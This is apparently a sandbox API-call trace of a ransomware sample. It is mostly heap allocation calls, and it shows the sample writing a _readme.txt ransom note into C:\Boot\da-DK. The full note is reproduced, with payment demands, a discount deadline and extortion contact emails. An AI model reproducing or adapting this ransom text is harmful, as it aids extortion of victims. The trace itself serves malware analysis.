RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.428] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0227.428] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.428] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.428] PathFindFileNameW (pszPath="") returned="" [0227.428] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.428] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.428] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.429] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.429] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0227.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.429] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0227.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.429] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.429] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.429] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.430] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.432] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.432] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.432] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.432] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.432] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.433] RtlAllocateHeap 